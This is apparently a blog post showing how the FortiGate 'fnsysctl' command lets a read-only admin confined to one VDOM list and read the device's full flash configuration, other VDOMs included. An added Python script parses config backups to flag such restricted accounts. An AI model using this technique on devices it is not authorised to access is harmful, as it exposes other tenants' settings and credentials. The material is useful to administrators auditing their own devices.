Wednesday, 11 May 2016

FortiGate CLI HACKING


This is a short note on the FortiGate CLI and how to get from it to a Linux shell (sort of).

Basically, as we know, most networking vendors use Linux as the main OS for their network devices, but for security reasons (they don't like to support old stuff) they hide the inner Linux shell from normal users (I don't like it :). On some devices this is done well, on others not so well, and some leave it only for debugging purposes (like Forti). In this class we have the good old FortiGate device; to tell the truth, I like these devices from a price point of view.

OK, back to the main topic: how to get to Linux from the FortiGate CLI. We have two possible solutions:

1. The first and easier solution is to use the magic command fnsysctl + <linux CMD>

Forti # fnsysctl ls
bin               data              data2             dev              
etc               fortidev-x86_64   fortidev4-x86_64  ipc_quar         
ipc_quar_backup   lib               lib64             migadmin         
proc              sbin              smo               tmp              
usr               var      


It's easy. The most interesting thing is that we can get to a higher privilege level with this command. For example, suppose I am a read-only user "test" dedicated to one VDOM (a virtual system, some kind of if) and with only read privileges:

# the profile for test - Read Only
config system accprofile
    edit "test"
        set admingrp read
        set authgrp read
        set comments "read"
        set endpoint-control-grp read
        set fwgrp read
        set loggrp read
        set mntgrp read
        set netgrp read
        set routegrp read
        set sysgrp read
        set updategrp read
        set utmgrp read
        set vpngrp read
        set wanoptgrp read
        set wifi read
    next
end


# the user dedicated to only test vdom
config system admin
    edit "test"
        set accprofile "test"
        set vdom "test"
        set password ENC ***********

    next
end

Now we can log in as our test user and see what we can do:

Forti login: test
Password: ****
Welcome !

Forti $ fnsysctl ls
bin               data              data2             dev              
etc               fortidev-x86_64   fortidev4-x86_64  ipc_quar         
ipc_quar_backup   lib               lib64             migadmin         
proc              sbin              smo               tmp              
usr               var        

Nothing special so far, but we can also list and read the full config of the FortiGate and see the other VDOMs' settings:

# the location of configs in Fortigate Flash:
Forti $ fnsysctl ls  /data2/config
cfg0000000036  cfg0000000037  cfg0000000038  cfg0000000039  cfg0000000040 
cfg0000000041  cfg0000000042  cfg0000000043  cfg0000000044  cfg0000000045 
cfg0000000046  cfg0000000047  cfg0000000048  cfg0000000049  cfg0000000050


And of course we can read them with cat:

Forti $ fnsysctl cat  /data2/config/cfg0000000075                                                                                                           
#config-version=FG100D-5.00-FW-build271-140409:opmode=0:vdom=1:user=admin
#conf_file_ver=23568740905703635265
#buildno=4429
#global_vdom=1

config vdom
edit root
next
edit ZONE1
next
edit test
next
edit opaopa
next
edit ZONE2
next
edit BRIDGE2

.....
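Since a read-only, single-VDOM account can read the whole config this way, it helps to know which accounts depend on that restriction. The following is an added example, not part of the original post and not Fortinet code: a small Python parser for a config backup in the config/edit/set/next/end format shown above. The function names and the sample config are made up for illustration.

```python
import shlex
# Constructed sample in the format of the page's snippets (not a real backup).
SAMPLE = '''config system accprofile
    edit "test"
        set comments "read"
        set fwgrp read
    next
    edit "ops"
        set fwgrp read-write
    next
end
config system admin
    edit "test"
        set accprofile "test"
        set vdom "test"
    next
    edit "ops"
        set accprofile "ops"
    next
end'''

def parse_config(text):
    """Collect {section: {entry: {key: value}}}; nested config blocks are tracked on a stack."""
    cfg, stack = {}, []                      # stack of [section name, current entry]
    for raw in text.splitlines():
        try:                                 # shlex handles quotes and '#' header lines
            tok = shlex.split(raw, comments=True) or [""]
        except ValueError:                   # part of a multi-line quoted value: skip it
            continue
        if tok[0] == "config":
            stack.append([" ".join(tok[1:]), None])
        elif tok[0] == "end" and stack:
            stack.pop()
        elif tok[0] == "edit" and stack and len(tok) > 1:
            stack[-1][1] = cfg.setdefault(stack[-1][0], {}).setdefault(tok[1], {})
        elif tok[0] == "next" and stack:
            stack[-1][1] = None
        elif tok[0] == "set" and stack and stack[-1][1] is not None and len(tok) > 2:
            stack[-1][1][tok[1]] = " ".join(tok[2:])
    return cfg

def restricted_admins(cfg):
    """Admins bound to a VDOM whose access profile grants nothing above 'read'."""
    profs, out = cfg.get("system accprofile", {}), []
    for name, adm in cfg.get("system admin", {}).items():
        perms = {v for k, v in profs.get(adm.get("accprofile"), {}).items() if k != "comments"}
        if perms and perms <= {"read", "none"} and "vdom" in adm:
            out.append((name, adm["accprofile"], adm["vdom"]))
    return out
```

The accounts it returns are the ones whose read-only, per-VDOM limits do not hold once fnsysctl is reachable, as shown above, so they are the ones to review for CLI access.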



Besides the basic commands we also have ping, cat, kill, killall, ifconfig, etc. Not all commands work, but it's enough for basic debugging.

The interesting thing is that the web GUI runs on the Django framework (Python-based):


fnsysctl ls /usr/lib/proj/                                                                                                                          
__init__.py   __init__.pyc  config.py     config.pyc    firewall     
fortiswitch   ftnt          logs          manage.py     pubredir     
registration  reports       router        settings.py   settings.pyc 
sprite        system        urls.py       user          utils        
utm           vpn           wanopt        wifi